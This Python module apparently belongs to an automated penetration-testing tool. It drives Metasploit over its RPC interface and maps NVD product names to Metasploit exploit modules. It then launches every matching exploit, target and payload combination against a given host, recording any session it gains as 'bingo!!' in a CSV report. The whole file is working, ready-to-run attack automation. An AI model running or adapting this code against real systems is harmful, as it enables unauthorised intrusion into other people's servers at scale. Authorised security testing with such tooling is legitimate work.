#!/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import csv
import json
import time
import re
import codecs
import configparser
import msgpack
import http.client
import pandas as pd
sys.path.append('../')
from util import Utilty

# Message-type labels passed as the first argument of Utilty.print_message().
# The bracketed marker beside each label is presumably the console prefix that
# print_message() emits for it (print_message lives in util and is not visible
# here) -- TODO confirm.
OK = 'ok'         # [*]
NOTE = 'note'     # [+]
FAIL = 'fail'     # [-]
WARNING = 'warn'  # [!]
NONE = 'none'     # No label.


# Interface of Metasploit.
class Msgrpc:
    def __init__(self, option=None):
        """Create the HTTP(S) connection object used to talk to the RPC server.

        Args:
            option: Optional mapping with the keys 'host', 'port', 'uri' and
                'ssl'. Missing or falsy entries fall back to '127.0.0.1',
                55552, '/api/' and False (plain HTTP) respectively.
        """
        # The former default was a list, which has no .get(), so calling
        # Msgrpc() without arguments raised AttributeError. Treat "nothing
        # supplied" (None or an empty container) as an empty mapping.
        option = option or {}
        self.utility = Utilty()
        self.host = option.get('host') or "127.0.0.1"
        self.port = option.get('port') or 55552
        self.uri = option.get('uri') or "/api/"
        self.ssl = option.get('ssl') or False
        # Session state; both fields are filled in by login().
        self.authenticated = False
        self.token = False
        self.headers = {"Content-type": "binary/message-pack"}
        if self.ssl:
            self.client = http.client.HTTPSConnection(self.host, self.port)
        else:
            self.client = http.client.HTTPConnection(self.host, self.port)

    # Call RPC API.
    def call(self, meth, option):
        """Send one MessagePack-encoded RPC request and return the decoded reply.

        Every method except 'auth.login' requires a prior successful login;
        the session token is then placed right after the method name.

        Args:
            meth: RPC method name, e.g. 'auth.login' or 'console.read'.
            option: Sequence of positional arguments for the method. It is
                left untouched (the request is built in a new list).

        Returns:
            The response body unpacked with msgpack.

        Exits the process with status 1 when called unauthenticated.
        """
        if meth == "auth.login":
            request = [meth] + list(option)
        else:
            if not self.authenticated:
                self.utility.print_message(FAIL, 'MsfRPC: Not Authenticated')
                # sys.exit() instead of the site-provided exit(), which is
                # meant for interactive use and may be absent (python -S).
                sys.exit(1)
            request = [meth, self.token] + list(option)

        params = msgpack.packb(request)
        self.client.request("POST", self.uri, params, self.headers)
        resp = self.client.getresponse()
        return msgpack.unpackb(resp.read())

    # Log in to RPC Server.
    def login(self, user, password):
        """Authenticate against the RPC server and remember the session token.

        Returns True on success; on any other reply a failure message is
        printed and the process exits with status 1.
        """
        reply = self.call('auth.login', [user, password])
        if reply.get(b'result') != b'success':
            self.utility.print_message(FAIL, 'MsfRPC: Not Authenticated')
            exit(1)

        self.authenticated = True
        self.token = reply.get(b'token')
        return True

    # Send Metasploit command.
    def send_command(self, console_id, command, visualization, sleep=0.1):
        """Write a command to a console, wait, then read the console output.

        Args:
            console_id: Identifier of the console to use.
            command: Command text to write.
            visualization: When truthy, the decoded output is also printed.
            sleep: Seconds to wait between the write and the read.

        Returns:
            The reply of the 'console.read' call.
        """
        self.call('console.write', [console_id, command])
        time.sleep(sleep)
        output = self.call('console.read', [console_id])
        if not visualization:
            return output

        try:
            text = output.get(b'data').decode('utf-8')
            self.utility.print_message(NONE, '{}'.format(text))
        except Exception as e:
            # Printing is best effort; the raw reply is returned regardless.
            self.utility.print_exception(e, 'Send_command is exception.')
        return output

    # Get all modules.
    def get_module_list(self, module_type):
        """Return the names of all modules of one type as a list of str.

        Args:
            module_type: One of 'exploit', 'auxiliary', 'post', 'payload',
                'encoder' or 'nop'.

        Returns:
            The module names decoded as UTF-8. An unrecognised module_type
            yields an empty list without contacting the server (previously it
            crashed with KeyError on the empty placeholder reply).
        """
        rpc_methods = {
            'exploit': 'module.exploits',
            'auxiliary': 'module.auxiliary',
            'post': 'module.post',
            'payload': 'module.payloads',
            'encoder': 'module.encoders',
            'nop': 'module.nops',
        }
        rpc_method = rpc_methods.get(module_type)
        if rpc_method is None:
            return []

        ret = self.call(rpc_method, [])
        return [module.decode('utf-8') for module in ret[b'modules']]

    # Get module detail information.
    def get_module_info(self, module_type, module_name):
        """Return the reply of the 'module.info' RPC call for one module."""
        rpc_args = [module_type, module_name]
        return self.call('module.info', rpc_args)

    # Get the payloads compatible with a module.
    def get_compatible_payload_list(self, module_name):
        """Return the payload names compatible with a module, decoded as UTF-8 str."""
        reply = self.call('module.compatible_payloads', [module_name])
        return [payload.decode('utf-8') for payload in reply[b'payloads']]

    # Get the payloads compatible with a specific target of a module.
    def get_target_compatible_payload_list(self, module_name, target_num):
        """Return the payload names usable with one target of a module, as str."""
        reply = self.call('module.target_compatible_payloads', [module_name, target_num])
        return [payload.decode('utf-8') for payload in reply[b'payloads']]

    # Get module options.
    def get_module_options(self, module_type, module_name):
        """Return the reply of the 'module.options' RPC call for one module."""
        rpc_args = [module_type, module_name]
        return self.call('module.options', rpc_args)

    # Execute module.
    def execute_module(self, module_type, module_name, options):
        """Launch a module and return its (job_id, uuid) pair.

        Args:
            module_type: Module category, e.g. 'exploit'.
            module_name: Module name as understood by the RPC server.
            options: Mapping of datastore options for the run.

        Returns:
            Tuple of the job id as delivered by the server and the run's uuid
            decoded to str. A field missing from the reply (for instance when
            the reply is an error description) is returned as None rather
            than raising KeyError, so a caller testing `uuid is None` can
            actually observe the failure.
        """
        ret = self.call('module.execute', [module_type, module_name, options])
        job_id = ret.get(b'job_id')
        uuid = ret.get(b'uuid')
        if isinstance(uuid, bytes):
            uuid = uuid.decode('utf-8')
        return job_id, uuid

    # Get job list.
    def get_job_list(self):
        """Return the ids of the jobs reported by 'job.list' as a list of int."""
        jobs = self.call('job.list', [])
        # The reply is keyed by job id encoded as bytes.
        return [int(raw_id.decode('utf-8')) for raw_id in jobs.keys()]

    # Get job detail information.
    def get_job_info(self, job_id):
        """Return the reply of the 'job.info' RPC call for one job."""
        rpc_args = [job_id]
        return self.call('job.info', rpc_args)

    # Stop job.
    def stop_job(self, job_id):
        """Ask the server to stop one job and return the reply of 'job.stop'."""
        rpc_args = [job_id]
        return self.call('job.stop', rpc_args)

    # Get session list.
    def get_session_list(self):
        """Return the reply of the 'session.list' RPC call."""
        no_args = []
        return self.call('session.list', no_args)

    # Stop shell session.
    def stop_session(self, session_id):
        """Issue 'session.stop' for a session; the id is sent as a string."""
        session_key = str(session_id)
        self.call('session.stop', [session_key])

    # Stop meterpreter session.
    def stop_meterpreter_session_kill(self, session_id):
        """Issue 'session.meterpreter_session_kill'; the id is sent as a string."""
        session_key = str(session_id)
        self.call('session.meterpreter_session_kill', [session_key])

    # Log out from RPC Server.
    def logout(self):
        """Invalidate the current token on the server and clear local state.

        Returns True on success; on any other reply a failure message is
        printed and the process exits with status 1.
        """
        reply = self.call('auth.logout', [self.token])
        if reply.get(b'result') != b'success':
            self.utility.print_message(FAIL, 'MsfRPC: Not Authenticated')
            exit(1)

        self.authenticated = False
        self.token = ''
        return True

    # Disconnection.
    def termination(self, console_id):
        """Kill the given console, then log out from the RPC server."""
        kill_args = [console_id]
        self.call('console.session_kill', kill_args)
        self.logout()


# Metasploit's environment.
class Exploit:
    def __init__(self, utility):
        """Load settings from config.ini and open an authenticated RPC console.

        The configuration is read from config.ini in the parent directory of
        this file ([Exploit] and [Report] sections). A Msgrpc client is then
        created, logged in, and a console is allocated for later commands.

        Args:
            utility: Helper object used for console messages and logging.

        Exits the process with status 1 when config.ini cannot be read.
        """
        # Read config file.
        self.utility = utility
        self.file_name = os.path.basename(__file__)
        self.full_path = os.path.dirname(os.path.abspath(__file__))
        self.root_path = os.path.join(self.full_path, '../')
        config = configparser.ConfigParser()
        try:
            # ConfigParser.read() silently skips files it cannot open, so a
            # missing config.ini used to slip past this handler and only
            # surfaced later as a KeyError. Opening the file explicitly makes
            # the failure reach the except clause below.
            with open(os.path.join(self.root_path, 'config.ini')) as fin:
                config.read_file(fin)
        except Exception as e:
            self.utility.print_message(FAIL, 'Reading config.ini is failure : {}'.format(e))
            self.utility.write_log(40, 'Reading config.ini is failure : {}'.format(e))
            sys.exit(1)

        server_host = config['Exploit']['server_host']
        server_port = config['Exploit']['server_port']
        msgrpc_user = config['Exploit']['msgrpc_user']
        msgrpc_password = config['Exploit']['msgrpc_pass']
        self.data_path = os.path.join(self.full_path, config['Exploit']['data_path'])
        # NOTE: the attribute name is misspelled ("converion") but is read
        # under this exact name by convert_product_name().
        self.converion_table_path = os.path.join(self.data_path, config['Exploit']['conversion_table'])
        self.timeout = int(config['Exploit']['timeout'])
        self.report_path = os.path.join(self.full_path, config['Report']['report_path'])
        self.report_temp = config['Report']['report_temp']
        self.action_name = 'Exploit'

        # Create Metasploit's instance.
        self.client = Msgrpc({'host': server_host, 'port': server_port})
        self.client.login(msgrpc_user, msgrpc_password)
        self.console_id = self.get_console()

    # Parse.
    def cutting_strings(self, pattern, target):
        """Return every match of the regular expression `pattern` in `target`.

        The result follows re.findall(): the captured group(s) when the
        pattern defines any, otherwise the whole match.
        """
        matcher = re.compile(pattern)
        return matcher.findall(target)

    # Convert NVD-style product names to Metasploit-style names.
    def convert_product_name(self, product_list):
        """Map NVD (vendor, name) entries to Metasploit product names.

        The conversion table CSV is expected to provide the columns
        'nvd_vendor', 'nvd_name' and 'metasploit'.

        Args:
            product_list: Iterable of entries whose item 0 is the vendor and
                item 1 the product name; '*' acts as a wildcard vendor.
                Entries whose name is '*' are skipped with a warning.

        Returns:
            List of the 'metasploit' values of every matching table row, in
            input order (duplicates are kept).
        """
        table = pd.read_csv(self.converion_table_path, encoding='utf-8').fillna('')
        converted = []
        for product in product_list:
            vendor, name = product[0], product[1]
            if name == '*':
                # Without a concrete product name there is nothing to look up.
                self.utility.print_message(WARNING, 'Not exist product name: {}'.format(product))
                continue

            name_matches = table['nvd_name'] == name
            if vendor != '*':
                rows = table[(table['nvd_vendor'] == vendor) & name_matches]
            else:
                rows = table[name_matches]

            # Extract product name for metasploit.
            converted.extend(rows['metasploit'])
        return converted

    # Create MSFconsole.
    def get_console(self):
        """Create a new console on the RPC server and return its id."""
        created = self.client.call('console.create', [])
        console_id = created.get(b'id')
        # One read is issued and its result discarded -- presumably to drain
        # the console's start-up output before real commands are sent.
        self.client.call('console.read', [console_id])
        return console_id

    # Get all Exploit module list.
    def get_all_exploit_list(self):
        """Return the names of all exploit modules ranked good or better.

        The list is cached in <data_path>/exploit_list.csv (one name per
        line). When that file exists it is read back; otherwise the list is
        built from the RPC server and written to the file.
        """
        self.utility.print_message(NOTE, 'Get exploit list.')
        self.utility.write_log(20, '[In] Get exploit list [{}].'.format(self.file_name))
        cache_file = os.path.join(self.data_path, 'exploit_list.csv')

        if os.path.exists(cache_file):
            # Get exploit module list from local file.
            self.utility.print_message(OK, 'Loading exploit list from local file: {}'.format(cache_file))
            with codecs.open(cache_file, 'r', 'utf-8') as fin:
                all_exploit_list = [line.rstrip('\n') for line in fin]
        else:
            self.utility.print_message(OK, 'Loading exploit list from Metasploit.')

            # Keep only the modules whose rank is one of the accepted ones.
            accepted_ranks = {'excellent', 'great', 'good'}
            all_exploit_list = []
            for name in self.client.get_module_list('exploit'):
                info = self.client.get_module_info('exploit', name)
                if info[b'rank'].decode('utf-8') in accepted_ranks:
                    all_exploit_list.append(name)

            # Save Exploit module list to local file.
            self.utility.print_message(OK, 'Loaded exploit num: {}'.format(str(len(all_exploit_list))))
            with codecs.open(cache_file, 'w', 'utf-8') as fout:
                for name in all_exploit_list:
                    fout.write(name + '\n')
            self.utility.print_message(OK, 'Saved exploit list.')

        self.utility.write_log(20, '[Out] Get exploit list [{}].'.format(self.file_name))
        return all_exploit_list

    # Create exploit tree.
    def get_exploit_tree(self, all_exploit_list):
        """Return, per exploit, its targets, per-target payloads and options.

        The tree is cached in <data_path>/exploit_tree.json. When that file
        exists it is loaded; otherwise every exploit in all_exploit_list is
        inspected through the console / RPC API and the result is saved.

        Returns:
            Dict keyed by exploit name. Each value holds 'targets' (target id
            -> list of payload names), 'target_list' (target ids as str) and
            'options' (option name -> decoded attributes plus an empty
            'user_specify' slot).
        """
        self.utility.write_log(20, '[In] Get exploit tree [{}].'.format(self.file_name))
        self.utility.print_message(NOTE, 'Get exploit tree.')
        tree_file = os.path.join(self.data_path, 'exploit_tree.json')

        if os.path.exists(tree_file):
            # Get exploit tree from local file.
            self.utility.print_message(OK, 'Loading exploit tree from local file: {}'.format(tree_file))
            with codecs.open(tree_file, 'r', 'utf-8') as fin:
                exploit_tree = json.load(fin)
        else:
            exploit_tree = {}
            show_cmd = 'show targets\n'
            for idx, exploit in enumerate(all_exploit_list):
                exploit = exploit.replace('\n', '').replace('\r', '')

                # Set exploit module.
                self.client.send_command(self.console_id, 'use exploit/' + exploit + '\n', False)

                # Get target: ask up to six times, one second apart, until
                # the console output contains the targets table.
                target_info = ''
                for attempt in range(6):
                    reply = self.client.send_command(self.console_id, show_cmd, False)
                    target_info = reply.get(b'data').decode('utf-8')
                    if 'Exploit targets' in target_info:
                        break
                    if attempt == 5:
                        self.utility.print_message(WARNING, 'Timeout: {}'.format(show_cmd))
                        self.utility.print_message(WARNING, 'No exist Targets.')
                        break
                    time.sleep(1.0)
                target_list = self.cutting_strings(r'\s*([0-9]{1,3}) .*[a-z|A-Z|0-9].*[\r\n]', target_info)

                # Get payload list of every target.
                payloads_by_target = {
                    target: self.client.get_target_compatible_payload_list(exploit, int(target))
                    for target in target_list
                }

                # Get options, decoding bytes keys and values to str.
                option = {}
                raw_options = self.client.get_module_options('exploit', exploit)
                for key, raw_attributes in raw_options.items():
                    attributes = {}
                    for attr_name, value in raw_attributes.items():
                        if isinstance(value, list):
                            value = [entry.decode('utf-8') for entry in value]
                        elif isinstance(value, bytes):
                            value = value.decode('utf-8')
                        attributes[attr_name.decode('utf-8')] = value

                    # User specify.
                    attributes['user_specify'] = ''
                    option[key.decode('utf-8')] = attributes

                # Add payloads and targets to exploit tree. The key order is
                # what ends up in the saved JSON file.
                exploit_tree[exploit] = {
                    'targets': payloads_by_target,
                    'target_list': target_list,
                    'options': option,
                }

                # Output processing status to console.
                progress = '{}/{} exploit:{}, targets:{}'.format(str(idx + 1),
                                                                 len(all_exploit_list),
                                                                 exploit,
                                                                 len(target_list))
                self.utility.print_message(OK, progress)

            # Save exploit tree to local file.
            with codecs.open(tree_file, 'w', 'utf-8') as fout:
                json.dump(exploit_tree, fout, indent=4)
            self.utility.print_message(OK, 'Saved exploit tree.')

        self.utility.write_log(20, '[Out] Get exploit tree [{}].'.format(self.file_name))
        return exploit_tree

    # Get exploit module list for product.
    def get_exploit_list(self, prod_name):
        """Search the console for server-side exploits matching a product.

        Args:
            prod_name: Product name placed in the console `search` command.

        Returns:
            Names ('exploit/...') of the hits whose third whitespace-separated
            field is 'excellent', 'great' or 'good'.
        """
        self.utility.write_log(20, '[In] Get exploit list [{}].'.format(self.file_name))
        search_cmd = 'search name:' + prod_name + ' type:exploit app:server\n'
        ret = self.client.send_command(self.console_id, search_cmd, False, 3.0)
        raw_module_info = ret.get(b'data').decode('utf-8')

        accepted_ranks = {'excellent', 'great', 'good'}
        module_list = []
        for exploit in self.cutting_strings(r'(exploit/.*)', raw_module_info):
            exploit_info = [field for field in exploit.split(' ') if field != '']
            # The pattern also matches 'exploit/...' fragments that are not
            # result rows (e.g. inside other text); those can have fewer than
            # three fields and used to raise IndexError.
            if len(exploit_info) > 2 and exploit_info[2] in accepted_ranks:
                module_list.append(exploit_info[0])
        self.utility.write_log(20, '[Out] Get exploit list [{}].'.format(self.file_name))
        return module_list

    # Get target list.
    def get_target_list(self):
        """Return the target ids (as str) listed by `show targets` on the console."""
        self.utility.write_log(20, '[In] Get target list [{}].'.format(self.file_name))
        reply = self.client.send_command(self.console_id, 'show targets\n', False, 3.0)
        console_text = reply.get(b'data').decode('utf-8')
        # The capture group is the leading number of each row.
        target_ids = self.cutting_strings(r'\s+([0-9]{1,3}).*[a-z|A-Z|0-9].*[\r\n]', console_text)
        self.utility.write_log(20, '[Out] Get target list [{}].'.format(self.file_name))
        return target_ids

    # Set Metasploit options.
    def set_options(self, target_ip, target_port, exploit, payload, exploit_tree):
        """Build the option mapping for one exploit run.

        Every required option of the exploit is filled in: with its
        'user_specify' value when that is non-empty, else its 'default';
        required options that have no 'default' entry are set to '0'.
        RHOST and RPORT are then set from the arguments, and PAYLOAD is added
        unless `payload` is the empty string.

        Args:
            target_ip: Value for RHOST.
            target_port: Value for RPORT.
            exploit: Key of the exploit inside exploit_tree.
            payload: Payload name, or '' for none.
            exploit_tree: Tree as produced by get_exploit_tree().

        Returns:
            Dict of option name to value.
        """
        self.utility.write_log(20, '[In] Set option [{}].'.format(self.file_name))
        option = {}
        for name, spec in exploit_tree[exploit]['options'].items():
            if spec['required'] is not True:
                continue
            if 'default' not in spec:
                option[name] = '0'
            elif spec['user_specify'] == '':
                option[name] = spec['default']
            else:
                # A non-empty "user_specify" takes precedence over the default.
                option[name] = spec['user_specify']

        option['RHOST'] = target_ip
        option['RPORT'] = target_port
        if payload != '':
            option['PAYLOAD'] = payload
        self.utility.write_log(20, '[Out] Set option [{}].'.format(self.file_name))
        return option

    # Run exploit.
    def exploit(self, target):
        """Try every matching exploit / target / payload combination on a host.

        For each Metasploit product name derived from the host's product
        list, the matching exploit modules are searched, and each module is
        executed once per target id and compatible payload. Every attempt is
        reported on the console and in the log; every attempt that yields a
        session is appended as a CSV row to a report file below
        <root>/logs/<fqdn>_<port>/. Finally the console is killed and the
        RPC client logged out.

        Args:
            target: Mapping with the keys 'fqdn', 'ip', 'port', 'prod_list'
                (entries accepted by convert_product_name) and 'path'.
        """
        msg = self.utility.make_log_msg(self.utility.log_in,
                                        self.utility.log_att,
                                        self.file_name,
                                        action=self.action_name,
                                        note='Execute exploit',
                                        dest=self.utility.target_host)
        self.utility.write_log(20, msg)

        # Get target info.
        target_fqdn = target.get('fqdn')
        target_ip = target.get('ip')
        target_port = target.get('port')
        product_list = target.get('prod_list')
        target_path = target.get('path')

        # Assemble log name.
        date = self.utility.get_current_date('%Y%m%d%H%M%S%f')[:-3]
        log_name = self.report_temp.replace('*', target_fqdn + '_' + str(target_port) + '_' + target_path + '_' + date)
        log_path_fqdn = os.path.join(os.path.join(self.root_path, 'logs'), target_fqdn + '_' + str(target_port))
        # makedirs(exist_ok=True) also creates a missing 'logs' parent and
        # has no window between an existence check and the creation.
        os.makedirs(log_path_fqdn, exist_ok=True)
        log_file = os.path.join(log_path_fqdn, log_name)

        # Convert product name nvd style to metasploit style.
        product_names = list(set(self.convert_product_name(product_list)))

        # Get all exploit list.
        all_exploit_list = self.get_all_exploit_list()
        exploit_tree = self.get_exploit_tree(all_exploit_list)

        # Get exploit modules link with product.
        for prod_name in product_names:
            for exploit_module in self.get_exploit_list(prod_name):
                # Set exploit module.
                self.client.send_command(self.console_id, 'use ' + exploit_module + '\n', False, 1.0)

                # Send payload to target server while changing target.
                for target_id in self.get_target_list():
                    # Get payload list link with target.
                    payload_list = self.client.get_target_compatible_payload_list(exploit_module, int(target_id))
                    for payload in payload_list:
                        # Set options. The tree is keyed without the leading
                        # 'exploit/' (8 characters).
                        option = self.set_options(target_ip, target_port, exploit_module[8:], payload, exploit_tree)

                        # Run exploit.
                        job_id, uuid = self.client.execute_module('exploit', exploit_module, option)

                        # Judgement.
                        if uuid is None:
                            # Time out.
                            result = 'timeout'
                        else:
                            timed_out = self._wait_for_job(job_id)
                            if self._report_session(uuid, log_file, target_ip, prod_name, target_id):
                                result = 'bingo!!'
                            elif timed_out:
                                # Previously this label was always overwritten
                                # by 'failure' and therefore never reported.
                                result = 'timeout'
                            else:
                                result = 'failure'

                        # Output result to console.
                        msg = '{}, target: {}, payload: {}, result: {}'.format(exploit_module,
                                                                               target_id,
                                                                               payload,
                                                                               result)
                        if result == 'bingo!!':
                            self.utility.print_message(OK, msg)
                        else:
                            self.utility.print_message(WARNING, msg)
                        msg = self.utility.make_log_msg(self.utility.log_mid,
                                                        self.utility.log_att,
                                                        self.file_name,
                                                        action=self.action_name,
                                                        note=msg,
                                                        dest=self.utility.target_host)
                        self.utility.write_log(20, msg)

        # Terminate
        self.client.termination(self.console_id)
        msg = self.utility.make_log_msg(self.utility.log_out,
                                        self.utility.log_att,
                                        self.file_name,
                                        action=self.action_name,
                                        note='Execute exploit',
                                        dest=self.utility.target_host)
        self.utility.write_log(20, msg)

    # Wait until a job leaves the job list; stop it after self.timeout polls.
    def _wait_for_job(self, job_id):
        """Poll once per second; return True when the job had to be stopped."""
        time_count = 0
        while job_id in self.client.get_job_list():
            time.sleep(1)
            if self.timeout == time_count:
                # Delete job.
                self.client.stop_job(str(job_id))
                return True
            time_count += 1
        return False

    # Log and close the session opened by the run identified by uuid, if any.
    def _report_session(self, uuid, log_file, target_ip, prod_name, target_id):
        """Return True when a session of this run was found, logged and closed."""
        sessions = self.client.get_session_list()
        for key in sessions.keys():
            session = sessions[key]
            # A session carrying this run's uuid means the exploit
            # probably succeeded.
            if session[b'exploit_uuid'].decode('utf-8') != uuid:
                continue

            # Gather reporting items.
            session_type = session[b'type'].decode('utf-8')
            session_port = str(session[b'session_port'])
            session_exploit = session[b'via_exploit'].decode('utf-8')
            session_payload = session[b'via_payload'].decode('utf-8')
            module_info = self.client.get_module_info('exploit', session_exploit)
            vuln_name = module_info[b'name'].decode('utf-8')
            description = module_info[b'description'].decode('utf-8')
            reference = ''.join('[' + item[0].decode('utf-8') + ']' + '@' + item[1].decode('utf-8') + '@@'
                                for item in module_info[b'references'])

            # Logging target information for reporting. newline='' is what
            # the csv module requires of its file objects; without it rows
            # get an extra '\r' on platforms that translate line endings.
            with open(log_file, 'a', newline='') as fout:
                csv.writer(fout).writerow([target_ip,
                                           session_port,
                                           prod_name,
                                           vuln_name,
                                           session_type,
                                           description,
                                           session_exploit,
                                           target_id,
                                           session_payload,
                                           reference])

            # Disconnect the session for next exploit.
            self.client.stop_session(key)
            self.client.stop_meterpreter_session_kill(key)
            return True
        return False
